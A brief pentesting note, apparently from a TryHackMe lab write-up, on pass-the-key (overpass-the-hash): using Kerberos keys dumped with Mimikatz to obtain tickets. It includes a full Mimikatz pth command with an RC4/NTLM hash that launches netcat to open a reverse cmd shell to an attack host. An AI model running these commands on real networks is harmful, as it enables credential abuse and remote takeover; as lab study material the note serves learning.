See also: overpass-the-hash (same thing, different names)
During Kerberos authentication, a key derived from NTLM hash is used to encrypt a timestamp. If the cached key can be captured with Mimikatz (sekurlsa::ekeys
), kerberos::pth
can be used to obtain TGT or TGS.
Four algorithms are available (DES, AES128, AES256, RC4) though DES is disabled by default. If the captured key is RC4:
mimikatz # sekurlsa::pth /user:Administrator /domain:za.tryhackme.com /rc4:96ea24eff4dff1fbe13818fbf12ea7d8 /run:"c:\tools\nc64.exe -e cmd.exe <attack-host-ip> 5556"
Note that for compatibility reasons, the key used in RC4 encryption is actually the user’s NTLM hash (i.e. without key derivation). Other password dumping / discovery methods may be useful if sekurlsa::ekeys
does not return results.